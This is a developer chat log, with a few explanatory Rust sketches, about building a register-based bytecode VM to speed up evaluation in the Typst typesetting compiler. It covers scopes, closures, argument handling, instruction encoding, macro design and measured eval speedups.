niiiiiiiiiiiiice
What do you think of naming that compile trait ByteCode instead? (yes I love bikeshedding :p)
I actually think we should change the nomenclature in the rest of typst to refer to compiling the document as typeset, compiling the modules as… compiling, and evaluating the code as evaluation
I think it overall makes more sense
compiling the module into what? modules? 🤣
but the CLI command is typst compile. do you want to change that to typst typeset too?
and the thing is called the compiler of the Typst typesetting language
no, change that
but the function internally is called typeset
well yea i guess Compile could be a bit generic perhaps
maybe ByteCodeCompile?
or VmCompile
eewww way too long π
yea
ByteCode on its own is probably a better idea than ByteCodeCompile
though VmCompile doesn't sound that bad either
Come on just ByteCode :p
less cool π
but that'd be inconsistent too
fn typeset(
world: Tracked<dyn World + '_>,
tracer: &mut Tracer,
content: &Content,
) -> SourceResult<Document> {
I mean you wrote it π
well yes
I thought you wanted to rename the public compile function
now we have
compile -> eval -> typeset -> export internally
no no I meant internally
I'm not sure I follow. Would you rename any of the existing functions?
no
I am just defending the Compile name for the trait
Thanks ❤️
I would probably also have called it that
But I guess I also have named both Trace and Tracer which are completely unrelated.
on an unrelated note: do you use cargo check or cargo clippy as rust-analyzer's check command?
because regarding performance I have found that going back to cargo check makes my IDE much more performant.
a bit unfortunate that I have to call cargo clippy manually now to ensure that CI will pass
are you using auto-save?
which is why I'm actually saving less and more after having done a batch of changes
I think I use check but not sure
did you test it on typst recently?
I did not, let me check
it's a little slower since the two main crates were merged
the diagnostics also come step by step. when doing a larger refactor, I can see folder by folder getting red
as mentioned before, for me (in VS Code) diagnostics completely disappear when saving and only come back once the new ones are available (even the unchanged ones). which is a bit of a pain.
typst bikeshed
typst t shorthand could also mean test I just noticed and, in fact, test is a subword of typeset.
for some definition of subword
I should also add that it differs. if the project has currently many errors, it takes longer, closer to 15s maybe. if it's in a compiling state, closer to 5s.
it's 2-6s for me
and I've been running a program for a few hours now that constantly takes up two threads
might just be the processor though
I must admit that I haven't actually measured. I just know that it feels pretty slow at times. But I think the worst times might have been on battery rather than plugged in.
But even though M1 is impressive, your desktop might also just be faster.
yeah, it's probably that
(after mainly using the work laptop for a while I definitely do notice the improved performance, even when just navigating in the editor)
(though that one has got an eighth gen low powered intel processor, so, not exactly the most powerful device on the market)
The difference between desktop cpu and a laptop one is that the desktop one can operate at max power for an extended period of time
Laptop ones cannot for thermal reasons
yeah
yes but incremental compilation and autocomplete are very bursty loads
so the difference in continuous TDP shouldn't matter that much
when I write pointer-code, unsafe code, clippy is too much anyways, and will fail code that builds/compiles. I'd use cargo check as r-a check command as a standard..
that sounds like the unsafe code might be doing things it should not be doing
I'm happy to say I fixed closures!
= Hello, world!
#set text(fill: red)
The lazy fox jumped over the brown dog.
#let call_once(fn) = { (fn)(100) }
#call_once(lorem)
This for example can already compile
So it's really getting there!
lovely π
Ok, I found a very sneaky bug with register remapping, I'm pretty sure it's correct now
(basically I could remap the output register without re-assigning it)
Ok so I'm having issues with captured values in closures, I'll try and figure it out tomorrow
@left night How are # before a value rejected normally? Because from what I can tell it should be at the lexer level? But for some reason it's allowing it in code mode π
ah no okay I need to extract the errors separately my bad
I fixed closure scopes and captured values
And now I fixed scopes during eval
Thesis when
soon™️
We can now iterate over values
only missing now:
- destructuring
- modules
destructuring ought to be easy
yes, I just need to adapt the old code π
modules won't be too hard either imo
I have a pretty good idea of how to implement them relatively easily
Doing so good @sturdy sequoia
Without taking runtime imports, I presume
Indeed, runtime import just won't be supported
good.
Why specifically?
I think it's error prone but I'm curious what you think π
yeah mostly error prone
mhm
(for now at least)
module imports just feel like they should be analogous to Rust use
if I write if cond { import "mod.typ"; } what's the scope of the import? Just the conditional?
Right now it'll be just the conditional yeah
is that already the case?
Sorry, what does "runtime import" mean here?
As in being able to conditionally import?
Or being able to provide a "dynamic string" to imports
dynamic string is what I meant
dynamic strings
you will still be able to conditionally import
If you finish today, and it changes performance by +-20% on thesis, we'll need to go on voice chat and celebrate/rant.....................
10x slower
I mean, just destructuring
then debugging

Destructuring is in
Destructuring works
For those wondering, without the doc (there is some but very sparse), the compiler and executors are close to 6k lines long

Poor @left night
With the doc and cleanup it'll likely be in the neighborhood of 10k lines
The first ever document compiled with the new eval
Ok so it's very picky about failing to remap registers
π
= Hello, world!
#show "Lorem": text(fill: red, "Lo")
#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)
This uses too many registers π
I figured out why
It's 450 times slower
Probably because of compilation lol
IT'S FASTER
@feral imp @sly pecan IT IS FASTER
thank god.
(I had forgotten to memoize closure calls)
we were literally holding our breath.
Now onto fix the bug so that I can test it on masterproef π
imagine running lorem(30) 5 times
I could have told you to do that 🤣 /s /s /s
scare away typsters with this simple trick
I'm running fibonacci(30)
oh, a piece of code that didn't compile lol
ohok
I think tonight masterproef will compile using the new compiler
famous last words
For 10k loc I bet laurmaedje needs it to be a bit fast.
I mean it replaces about 3k loc
Ok, it's a lot less than I thought
im more impressed that you did this in like a few days
:p
i dont have that much free time π
THERE ARE NO MORE todo!()
I mean there are bugs, I am now fixing the tests π
Actually most of the failed tests are just slight span differences
waiting intensifies for Goossa; Will typst performance exceed what Man has yet to witness?
@sturdy sequoia have you already submitted your thesis or is optimizing Typst just part of your procrastination? xD
I got 18/20 on my thesis :-p
ok haha nice π
We are waaaaiting..
IIUC It can't compile the thesis yet
I mean
But maybe today? :p
Dherse stands to his words except when it comes to gradients
Well "tonight" has just started in their timezone I believe
So let's give Dherse some time π
Shouldn't the output be identical?
my compiler generally takes bigger spans at the moment
but I'll work on improving it!
I don't know what a span is, but good job!
I love seeing everyone so invested in your work Dherse πβ€οΈ
it's a good investment
A Span is basically an ID to somewhere in the (typst) source
So what does having bigger spans mean?
It means it globs more of your code
so instead of this it might be this. that gets globbed
obviously not great but I plan on improving upon that later
Does it have consequence for the actual output?
no
but it might affect preview <-> source click (in the webapp)
and it makes most tests fail
I don't know yet, I am tracking down two bugs that prevent me from compiling it
and I took a long break
Ok so there's still something wrong with scopes
and methods will be the death of me
they're parsed so... weirdly
time to.. rewrite typst?
rewrite it in Zig
Ok so, doing register optimization S-U-C-K-S
I am going for another method of re-using registers
I'm happy to say that this new method shaved a good 2k lines from the total
I quite like it. I like using https://godbolt.org/ to see how tight my loops are. But it's probably more useful for micro-controllers. I have no idea what it's like on big-boy systems.
i think they're talking about registers in their VM
Oh boy… that's some new sort of fun. But wouldn't that technically be cached vs. register? I suppose it depends on the host system.
no no
I am building a typst VM for faster eval
and it uses registers
So it uses custom instructions and virtual registers… And you're working on jit optimization? … mostly guessing. How wide are the registers, how many are used?
This does not include a JIT
Register optimization is simply the process of choosing the best registers so that as few moves or interactions with the stack as possible have to occur
It's 32 registers. Their width I don't know
But the registers aren't simply 64 bit numbers like in hardware, but complex values
At least I assume as much
Wouldn't that need to assume the most common instructions/stack operations?
Considering it's a very specific workload it wouldn't really be guessing per se?
It just needs to check things like whether the value of one register is still being required
Exactly, but before I was doing it in a post-process pass, but I realized that I can just do it as I go which is much faster and easier
Or it could determine that one register should be used for something else instead and the existing value can simply be dropped onto the stack in the meantime
Faster easier == better solution
*footnote: it also causes all system files to be instantly deleted
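To illustrate the "do it as I go" idea, here is a rough sketch of an allocator that hands out and reclaims registers during compilation instead of remapping them in a later pass. It is only an assumption about how this could work: the `RegisterAllocator` name, the bitmask representation and the "lowest free register" policy are all hypothetical, and only the count of 32 comes from the discussion.

```rust
/// Hypothetical handle to one of the VM's virtual registers.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct Register(pub u8);

/// Tracks which of the 32 registers currently hold a live value.
pub struct RegisterAllocator {
    /// Bit `i` is set while register `i` is in use.
    in_use: u32,
}

impl RegisterAllocator {
    pub fn new() -> Self {
        Self { in_use: 0 }
    }

    /// Returns the lowest free register, or `None` if all 32 are live.
    pub fn alloc(&mut self) -> Option<Register> {
        let free = !self.in_use;
        if free == 0 {
            return None;
        }
        let index = free.trailing_zeros() as u8;
        self.in_use |= 1u32 << index;
        Some(Register(index))
    }

    /// Releases a register as soon as its value is no longer needed,
    /// so the next expression can reuse it.
    pub fn free(&mut self, register: Register) {
        self.in_use &= !(1u32 << register.0);
    }
}
```

The compiler would call `alloc` when an expression needs a destination and `free` right after the last use, so no separate liveness pass is required for the simple cases.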
Mind you, we don't have a stack
I mean we have more than one
but they're for very specific situations
for example we have an iterator stack to store rust native iterators in loops
since typst doesn't have iterators
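A small sketch of what such an iterator stack might look like, under the assumption that each loop pushes one boxed Rust iterator and the loop's "next" step always pulls from the innermost one. The `IterStack` type and the use of `i64` items are hypothetical simplifications; the real VM would iterate over Typst values.

```rust
/// Hypothetical side stack holding the native iterators of active loops.
pub struct IterStack {
    iters: Vec<Box<dyn Iterator<Item = i64>>>,
}

impl IterStack {
    pub fn new() -> Self {
        Self { iters: Vec::new() }
    }

    /// Entering a loop pushes its iterator.
    pub fn push(&mut self, iter: impl Iterator<Item = i64> + 'static) {
        self.iters.push(Box::new(iter));
    }

    /// Advances the innermost loop. When it is exhausted, the iterator is
    /// popped and `None` tells the VM to jump past the loop body.
    pub fn next(&mut self) -> Option<i64> {
        let value = self.iters.last_mut()?.next();
        if value.is_none() {
            self.iters.pop();
        }
        value
    }

    /// Number of loops currently active.
    pub fn depth(&self) -> usize {
        self.iters.len()
    }
}
```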
What happens when a function is called?
Where does the context of the calling function end up
it copies all of the captured values into the function's scope, same with the args, then spins up a new VM
the reason why it spins up a new VM is because the calls get memoized
and the VMs are dirt cheap to initialize since they mostly borrow values
Huh
So it's not as fast as possible but that isn't the goal either
Do the arguments not end up in specific registers but instead some special value then?
they end up in a list of arguments, and the function gets them one-by-one into registers
I plan on replacing locals and args with registers but I haven't done it yet
Not an option I usually have access to. But I like it.
What happens if a function takes more than 32 arguments?
Again, it's not a VM in the traditional sense, it's a VM like the Java VM
yeah then you'd be out of registers
There is no stack
Mind you you can call a function with more than 32 args
does it blow up Typst then?
crash and burn?
Is a dictionary one argument?
no, it just works
I don't understand the question
Where do the excess arguments end up?
That was my actual question
basically, it allocates a Value::Args in a register and it pushes them into it one-by-one, so you can call with as many args as you want
When a function is called, it loads the arguments into registers on use
Oh I see
So you can have as many args as you want
I'm just guessing the arguments are by pointer and that there's typically just one Args item
indeed, it's just one Args passed by value
Or perhaps nothing.
indeed, if there are no args it doesn't bother to allocate anything
So what do the other 31 registers do? Do you mark them as in use and just allocate deallocate them based on need?
basically, but in a function being called arguments are stored in their own special purpose registers
so you always have 32 registers
it's only when you're calling a function that it uses the Args data structure
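The caller side of this can be sketched roughly as follows. This assumes a toy `Value` enum and a `Vm` with a flat register file; both are hypothetical stand-ins, and only the idea (one `Args` value in a single register, allocated lazily and filled one argument at a time) is taken from the description above.

```rust
/// Toy value type; the real one is far richer.
#[derive(Debug, Clone, PartialEq)]
pub enum Value {
    None,
    Int(i64),
    Args(Vec<Value>),
}

pub const REGISTER_COUNT: usize = 32;

pub struct Vm {
    registers: Vec<Value>,
}

impl Vm {
    pub fn new() -> Self {
        Self { registers: vec![Value::None; REGISTER_COUNT] }
    }

    /// Pushes one argument into the `Args` held in `reg`, creating the
    /// `Args` on the first push so a call without args allocates nothing.
    pub fn push_arg(&mut self, reg: usize, arg: Value) {
        match &mut self.registers[reg] {
            Value::Args(list) => list.push(arg),
            slot => *slot = Value::Args(vec![arg]),
        }
    }

    /// Moves the value out of a register, leaving `Value::None` behind.
    pub fn take(&mut self, reg: usize) -> Value {
        std::mem::replace(&mut self.registers[reg], Value::None)
    }
}
```

Because all arguments live inside one register, the number of call arguments is not limited by the 32-register file.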
Ok, methods are finally fixed afaik
Now all that's left are the scopes being a bit borked yet again
but I'll fix that next time I have time to work on it
I mean I did figure it out: (noting here for future me)
It cannot capture from the parent's parent's scope. This means that I need to create a bigger hierarchy of captures and be able to do recursive capturing, not particularly hard but I need to do it
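One way to sketch the recursive capturing mentioned here: when a name is not found in the current closure, ask the parent, and on success record the name as a capture at every level on the way back down. The `Scope` and `Resolved` types and the `resolve` function are hypothetical; this is an illustration of the idea, not the actual compiler code.

```rust
use std::collections::HashMap;

/// Hypothetical compile-time scope of one closure body.
#[derive(Default)]
pub struct Scope {
    /// Names declared directly in this closure, with their slot.
    pub locals: HashMap<String, usize>,
    /// Names this closure has to capture from its parent.
    pub captures: Vec<String>,
}

/// Where a name lives, seen from the innermost scope.
#[derive(Debug, PartialEq)]
pub enum Resolved {
    Local(usize),
    Capture(usize),
}

/// `scopes[0]` is the outermost closure, the last element the innermost.
pub fn resolve(scopes: &mut [Scope], name: &str) -> Option<Resolved> {
    let (current, parents) = scopes.split_last_mut()?;
    if let Some(&slot) = current.locals.get(name) {
        return Some(Resolved::Local(slot));
    }
    if let Some(index) = current.captures.iter().position(|c| c == name) {
        return Some(Resolved::Capture(index));
    }
    // Recurse into the parent chain. If the name exists anywhere above,
    // every intermediate closure ends up capturing it as well.
    resolve(parents, name)?;
    current.captures.push(name.to_string());
    Some(Resolved::Capture(current.captures.len() - 1))
}
```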
Still the best solution π
Exciting times
Thanks ❤️
@sturdy sequoia we're waiting for the fix
no, it's the price you must pay for fast document compilations π
oh ok
i can understand that
you said continue in next weekend, probably.
I know but I can't stop
who cares that I have a technical interview later today π
Very charmπ₯
Fake it till you make it
BTW, removing the instruction deduplication almost halved rust's compile time
So it was definitely worth it
And I checked another bytecode VM and they do it the way I am now doing it so I'm not re-inventing the wheel
obsession i cannot sleep
you can't? why π¦
That's the plan, with my good friend ChatGPT π
No you can't, because you're obsessed
Oh no, I slept like a baby 
Could've slept some more tho
So now there is something wrong with conditions producing a boolean 
I figured it out
But now I really must prepare my interview π
Next issue: some captures don't work for reasons unknown π
the guy is UNSTOPPABLE
UNTYPSTABLE
Can't even pandoc Dherse -o Dherse.typ :(
π
Ok, so, it can compile: the preface and the introduction
getting there!
Chapter 1 compiles too π
Now tablex doesn't compile π
@glad urchin see what you're doing to me!
i mean, did it compile in the first place? lol
Ok, it's improving
It almost compiles the thesis now
it fails many iterations in
I think my code just found a bug in queries
π§
@tight glade @sly pecan @glad urchin @left night @feral imp I can now confirm that the new evaluation system is significantly faster. I don't know yet exactly how much faster (I need to do more testing), but at least 3x faster even when taking into account the extra compilation that needs to be performed before eval
π
And I think that with borrowing and a few other optimizations it might be even faster
How big a part of compilation is eval though?
I assume compilation as a whole isn't 3x faster
In this case I am trying on an eval heavy document while I keep fixing bugs
π
Ok, so using the handy-dandy --timings argument:
- Before rework: 5.7s of which 1.2s is layout => eval is 4.5s
- After rework: 2.33s of which 1.2s is layout => eval is 1.13s
Meaning a speedup of almost 4x in eval
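Spelling out the arithmetic behind these numbers, under the same assumption made above that everything other than layout counts as eval (which now includes bytecode compilation):

```latex
\begin{align*}
t_{\text{eval}}^{\text{before}} &= 5.7\,\text{s} - 1.2\,\text{s} = 4.5\,\text{s} \\
t_{\text{eval}}^{\text{after}}  &= 2.33\,\text{s} - 1.2\,\text{s} = 1.13\,\text{s} \\
\frac{t_{\text{eval}}^{\text{before}}}{t_{\text{eval}}^{\text{after}}} &= \frac{4.5}{1.13} \approx 3.98 \\
\frac{t_{\text{total}}^{\text{before}}}{t_{\text{total}}^{\text{after}}} &= \frac{5.7}{2.33} \approx 2.45
\end{align*}
```

So eval alone is about 4x faster, while the document as a whole compiles about 2.4x faster because layout time is unchanged.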
is that your thesis?
These are obviously very rough numbers because compilation is cached across invocations
No, it's a second document I'm using for testing
My thesis still doesn't compile, but I don't know what the bug is... YET!
@left night I do think I will end up rewriting it as an array of structs because currently I am quite limited in doing things like "either a register, a constant, a local, or an arg" which leads to way more instructions than needed
Instead I could just have a system like OpCode(Flags) being 16 bits where the Opcode is 8 bits and the flags are 8 bits indicating how the arguments work
I think that could lead to much faster execution and less instructions overall
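As a rough sketch of the `OpCode(Flags)` idea: an 8-bit opcode in the high byte and 8 flag bits in the low byte, packed into one `u16`. The concrete opcodes and the meaning of the individual flag bits are hypothetical; the discussion only fixes the 8 + 8 bit split.

```rust
/// Hypothetical opcode set; only the `repr(u8)` shape matters here.
#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum OpCode {
    Add = 0,
    Set = 1,
    Jump = 2,
}

/// Hypothetical flag bits describing how each operand is interpreted.
pub mod flags {
    pub const LHS_IS_CONST: u8 = 1 << 0;
    pub const RHS_IS_CONST: u8 = 1 << 1;
    pub const DEST_IS_LOCAL: u8 = 1 << 2;
}

/// Packs the opcode into the high byte and the flags into the low byte.
pub fn encode(op: OpCode, flags: u8) -> u16 {
    ((op as u16) << 8) | flags as u16
}

/// Splits a word back into opcode and flags; unknown opcodes yield `None`.
pub fn decode(word: u16) -> Option<(OpCode, u8)> {
    let op = match (word >> 8) as u8 {
        0 => OpCode::Add,
        1 => OpCode::Set,
        2 => OpCode::Jump,
        _ => return None,
    };
    Some((op, word as u8))
}
```

With this layout a single `Add` opcode can cover register, constant and local operands, instead of needing one instruction variant per combination.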
does eval heavy mean you actually have to use eval in typst? like mitex does?
no, it means it runs a lot of typst code
like you would see using cetz or tablex, or anything that does data processing in general
ah okay
I think you meant "structure of arrays" here, maybe? 🤔
oh yes sorry
I'm tired
is there a reason for it though other than some instructions possibly being longer than they should be?
It saves memory since there is no wasted space
It saves cache utilization (for the same reason)
It can be faster
well, it can, but you will need to measure it
It can save tons of instructions by giving me more freedom in how I am "crafting" the instructions by being able to have more than one value
indeed
the problem with SoA is that it's harder to support, and here I don't see much reason to use it
instructions are executed in sequential order anyway, so you will get good cache occupancy thanks to prefetching either way
If I go the SoA route, I'll write a proc-macro to generate the instruction and builders for them, that way it's not too error-prone
even if instructions are like 32 bytes long
That's true, but I would ideally like to keep them as short as possible to get the most cache occupancy possible
well, L1 is 32 kb anyway - that's pretty big, enough to fit every hotspot for sure
Well that's platform dependent :-p
thing is, SoA is usually implemented if you can take the advantage of parallelism, because you will be able to work with multiple objects anyway thanks to SIMD
and here it is not the case
well
unless you are going to implement some kind of SIMD instruction parsing...
no lol
which would be kind of cool but also too cool
lmao
anyway, you can try, it would be interesting to see the difference for sure
how are constants stored? is it like a global (for every function/block of code/something) array which you can index within some instructions?
it's module-local or function-local (depending if you're in a module or a function, function always have their own copies of everything)
ok, makes sense... I was going to say that if you want to improve code cache occupancy it might be worth considering improving cache occupancy of something else instead (making layout of everything more predictable will make predictable layout of code even more predictable), but I suppose it's not as simple as it may seem 🤔
anyway, do your thing and try to compensate for carbon emissions of your compilations, I suppose π
What I want is mostly to get a first draft that works, and then try different improvements mostly
nice
omg
it did not, queries found a bug in my code π
@sturdy sequoia fun memories. this was the "first" content rework, which moved from an enum to something pretty close to what we have now (but obviously with way less features). the dynamic Attr thing only came later. this goes to show how far-reaching a single bad design decision is.
Actually with hindsight I think it made a lot of sense, especially when you consider that you didn't have the proc-macro at the time
What's the bad design decision here?
moving to dyn structs
the old Content system with a EcoVec<Attr> to store fields
Hmmm 🤔
Speculative execution
cold compilation? What about incrementally?
I can't say just yet, I'll try once I have a larger doc!
But eval speed seems to be really improved
incrementally it should be even higher 🤔
I'm still having some issues in tablex and running tests is actually surprisingly hard (because spans don't match for... reasons)
Have you already applied comemo, or this is a result of executing bytecode without caching.
yes, there is already memoization for closure calls and module loading
but there is no caching dedicated to compilation (yet)
You have announced 2x, 3x, 4x performance improvements again and again. There should be at one another
Well it's been very gradual π
Small gains x infinity = big gains π
I think it's quite nice because I have also made bytecode compilation part of the timings
proof that tablex is great to extensively test eval
π
yes π
Q: is bytecode compilation memoized as well?
no
but eventually it will be of course
i see
The thesis and, the table package.
I also added module eval as a thing, I just need to add closure compilation
cuz i often see some talks about the idea of using a JIT but I think that's going perhaps way too far
some (comparatively) simple bytecode memoization could perhaps be more suitable
if that makes sense
I generally agree, I think the gains we'll have here will already be awesome
Is bytecode serializable? I think we can have a /target directory like rust storing black hole of bytecode now. π
it would be trivially serializable π
53 GiB typst-target folder
it's just a BUNCH of u16s
Really depends how long it takes to compile to bytecode
fair
Like compiling most of the bytecode in my thesis takes around 20ms
and my thesis is long and includes tablex π
and I think that parsing and compilation could be deferred to multiple threads π
just use 0.10.0
happy to help π
im gonna make a patch for typst 0.[version with bytecode].0 which just replaces all Compile implementations with a mock
that should help
And can we also say that results of evaluation are safe to cache on disk? We were imagining a persistent comemo cache, but something like pointers prevents it.
from what I saw, yes
Well you could cache them but that would require serializing (which is slow)
but for bytecode then it's trivial because there are no pointers
everything is done with IDs into shared arrays
like ConstId for constants, StringID, etc.
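To show why a pointer-free stream of `u16`s is easy to persist, here is a minimal sketch that writes the words as little-endian bytes and reads them back. The byte order and the function names are assumptions made for illustration; nothing here reflects an actual on-disk format.

```rust
/// Serializes bytecode words as little-endian bytes (assumed byte order).
pub fn to_bytes(code: &[u16]) -> Vec<u8> {
    code.iter().flat_map(|word| word.to_le_bytes()).collect()
}

/// Reads the words back; an odd number of bytes is rejected.
pub fn from_bytes(bytes: &[u8]) -> Option<Vec<u16>> {
    if bytes.len() % 2 != 0 {
        return None;
    }
    Some(
        bytes
            .chunks_exact(2)
            .map(|pair| u16::from_le_bytes([pair[0], pair[1]]))
            .collect(),
    )
}
```

Since operands are IDs into shared arrays rather than addresses, the bytes stay valid across processes as long as the constant and string tables are stored alongside them.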
Some of them, I refer to at least @onyx furnace's a large set of plugin calls in his 2500 pages document, are valuable to persist.
true, but in the case of @onyx furnace's doc, I think moving to wasmtime would already be a huge improvement
I have tested it and it like halved the compilation time
maybe there could be a way of timing calls to check how long they each take and only keeping those that ran very long
(doesn't have to be time specifically, could also just be counting number of instructions executed)
the problem isn't that the individual calls are slow, is that there are so goddamn many of them π
That's why I've been thinking of "deferred" calls, where the value is only known when it's needed
But of course that would require plugins to be Send + Sync
Anyway, I'm off to bed ❤️
that sounds like a good idea for me as well
I think we will get further improvements. But you are right, there are other ways to improve, and it is already fast enough even without persisting the cache.
Another day on #1176509648707256370.
will this make it faster? i think this is not parallelizable.
yes. in that case, time is used in plugin calls
the flamegraph looks amazing
may i know which doc you use for testing? i guess thesis, tablex doc, cetz doc should be "eval-heavy" ones?
It's more that we could parse all of the files in your project all at once
yes I am soooooo happy about the --timings feature and how it came out. Thank you very very much to you and @untold turret for the idea of making it compatible with chrome traces! It's awesome
only if import/include is required to have static paths or if we do it optimistically for those that are static
but overall yes
Yes of course, I am using several ones, but my "workhorse" for this work is a mandelbrot. My thesis doesn't compile yet, I am slowly working through the automated tests to figure out what is wrong
but we potentially also eval shared leafs twice unnecessarily
In the end what I find funny is that parsing takes significantly longer than compilation which I was not expecting
and parsing we can notably not do completely in parallel
since we obviously need to find those imports
true true, but perhaps the parser could automatically add "static" imports to a big list of files that are "in the path" so-to-speak for parsing and compiling in a deferred way?
It's no big deal either way, it doesn't account for very much anyway
But I think it's a "low hanging fruit" for making eval faster
slightly faster *
@left night BTW I hope you don't mind that I am looking into eval but I like these "bigger" projects, I find them really rewarding to work on and with all of the reworks you're doing in other parts of the codebase I didn't want to cause trouble there so I figured eval was a good place to work on to cause as little friction as possible on your own work
It also has really motivated me to work on Typst again ❤️
Really sorry for being a bit harsh with the revoke thing the other day π
Don't worry about it, it's already forgotten
It's very cool that you're taking this bytecode thing on
mandelbrot is definitely very scripting-heavy! nice for this taskπ
indeed π
I wanted something that would really test eval more than anything else
@left night are destructure patterns in for loop supposed to be defined within the parent's scope? like this:
for i in range(10) { ... }
// Is `i` valid here?
i
or should i remain scoped to the loop?
I think it should be the latter but I'm curious what you think
Former is how it is done in R, so.... I don't think so.
Aren't you supposed to like R? π
Off-topic.

It should remain scoped to the loop (that's also how it works on main from a quick test).
yes, I figured it's just a bit ugly with the way my compiler currently works
I'll fix that π
There may be some specification interpreter for typst, which never launch too many optimization. And the answer is its result.
@left night what do you think of a macro like this for creating instructions:
isr! {
Add -> Register | Local {
lhs: Register | Constant | Local | Global | Param | Capture,
rhs: Register | Constant | Local | Global | Param | Capture,
} => |add| {
std::ops::add(add.lhs(), add.rhs())
}
#[scope]
Iter {
value: Register | Constant | Local | Global | Param | Capture,
target: Iterator,
}
#[flow]
And {
lhs: Register | Constant | Local | Global | Param | Capture,
rhs: Register | Constant | Local | Global | Param | Capture,
target: Jump,
} => |and, cf| {
let lhs = and.lhs().cast::<bool>()?;
if !lhs {
cf.jump(and.target());
Value::None
} else {
let rhs = and.rhs().cast::<bool>()?;
Value::Bool(lhs && rhs)
}
}
#[flow]
If {
condition: Register | Constant | Local | Global | Param | Capture,
then: Jump,
else: Jump | None,
} => |if, cf| {
if if.condition().cast::<bool>()? {
cf.jump(if.then())
} else {
cf.jump(if.else())
}
}
#[flow]
#[scope(consume)]
Label {
label: Jump,
pop: bool,
} => |label| {
if label.pop() {
label.scope().pop()
}
}
#[flow]
Next -> Register | Local {
iter: Iterator,
bottom: Jump,
} => |next, cf| {
if let Some(value) = next.iter().next() {
value
} else {
cf.jump(next.bottom());
Value::None
}
}
#[flow]
Jump {
target: Jump,
} => |jump, cf| {
cf.jump(jump.target())
}
#[flow]
Break {
target: Jump,
} => |break, cf| {
// We want to go into breaking mode.
cf.break(break.target())
}
}
(obviously mockup code)
Does that also define the instructions as types, or only implement traits?
it would create a bunch of things actually
all of the opcodes (as a repr(u8) enum), all of the bitflags for the different types that each argument can take, etc.
and builder structs for every single instruction to make creation nicer
I have no idea what it means at all π¬π
What does -> mean
defines the output of the instruction
so Add produces either a Register or a Local
and then when the closure is called, it would produce a Value that would automatically be stored in the right place
Hmmm maybe i just don't have enough context to understand
But typically what is the right place
It depends, it will either be stored in a register or stored in a local
my idea is that it can be done with the one instruction
But don't we need to know which register or local?
exactly
that's the annoying part right now
with this it could be made much easier
I would also write it in a binary format with dynamic length instructions
I remain confused as to what happens precisely as a consequence of this macro invocation
I can only work with what i imagine is needed for your vm so I'd suggest choosing one of the simplest instructions and writing the non pseudo code version of the macro
It would produce:
Wouldn't dynamic length instructions complicate jumping a lot?
Wouldn't it be better to create the enum separately and have a macro to implement all of the auxiliary things?
- A builder for each instruction
- The Instruction enum
- The Compiler struct
- The Executor struct
- An accessor for each instruction
- The eval method on the executor
Maybe even a derive macro
I want a single macro doing everything, specifically handling the dynamic length instructions
Yeah well i don't
π
lol jk
But I mean I just think it's weird to generate the types as well, idk
Unless it would be really hard to generate the types by hand
Somehow
Nice! It does all the job π
Then to implement eval or bytecode for something you'd just return a list of instructions?
Well i see an interest in grouping all that logic, would the macro be comprehensible by mere mortals? π
the macro would definitely be a mess π
ππ
but it would make reading the VM code much much easier
Like how do you plan to handle dynamic length instructions?
based on each opcode it would know how many bytes to read
Sounds like you maybe need zero abstraction types to handle that complexity and then combine these lower-level bricks to build a system in which you can express the vm
it would look like:
| 8-bit | 8-bit | 16-bit | 8-bit | 16-bit | 8-bit | 16-bit |
|--------|--------|----------------|--------|----------------|--------|----------------|
| OpCode | Flag | Arg0 | Flag | Arg1 | Flag | Dest |
The flag would tell it what the argument is, so if it's a register, a const id, a local id, etc.
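A decoding loop for this layout could look roughly like the sketch below: read the opcode byte, look up how many operands that opcode has, then read one flag byte plus a 16-bit value per operand. The opcode numbers, the flag values, the little-endian operand encoding and the `Operand` enum are all hypothetical; only the "opcode, then (flag, 16-bit value) triples" shape comes from the table above.

```rust
/// Hypothetical operand kinds selected by the flag byte.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Operand {
    Register(u16),
    Constant(u16),
    Local(u16),
}

/// How many (flag, value) operands follow each opcode (made-up table).
fn operand_count(opcode: u8) -> Option<usize> {
    match opcode {
        0x01 => Some(3), // Add: lhs, rhs, dest
        0x02 => Some(1), // Jump: target
        _ => None,
    }
}

/// Decodes one instruction at `pc` and returns the opcode, its operands
/// and the position of the next instruction.
pub fn decode(bytes: &[u8], pc: usize) -> Option<(u8, Vec<Operand>, usize)> {
    let opcode = *bytes.get(pc)?;
    let count = operand_count(opcode)?;
    let mut cursor = pc + 1;
    let mut operands = Vec::with_capacity(count);
    for _ in 0..count {
        // One flag byte followed by a little-endian 16-bit value.
        let chunk = bytes.get(cursor..cursor + 3)?;
        let value = u16::from_le_bytes([chunk[1], chunk[2]]);
        operands.push(match chunk[0] {
            0 => Operand::Register(value),
            1 => Operand::Constant(value),
            2 => Operand::Local(value),
            _ => return None,
        });
        cursor += 3;
    }
    Some((opcode, operands, cursor))
}
```

Because the instruction length follows from the opcode alone, jump targets can stay plain byte offsets that the compiler computes when it emits the code.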
yes that's what I would do
That should reduce the need for a macro then right?
Not really, because creating all of the builders etc. would be a giant chore
Maybe simpler macros here can help? π π
Seems like we're moving the complexity around π
I mean I could do one macro per instruction and then a big macro that takes all of the other ones in
🤷‍♂️
like:
instruction! {
struct Add -> Register | Local {
lhs: Register | Constant | Local | Global | Param | Capture,
rhs: Register | Constant | Local | Global | Param | Capture,
}
}
That's like the same thing to be honest π
Then I can do something like:
impl Exec for Add<'_> {
fn exec(self, cf: &mut ControlFlow) -> StrResult<...> {
ops::add(self.lhs(), self.rhs())
}
}
I think you can still use macros, i just think you don't need to make everything a macro
Oh!
E.g. this could be a derive macro
It would be much more readable too
That does sound nice
no, because I can't do custom syntax for the multiple input types and I can't easily specify the output type
Huh?
I need to specify the multiple different types that an input can take
additionally, I also need to specify its output type
a derive macro cannot do that
an attribute macro could
Where would this be used? In the field types?
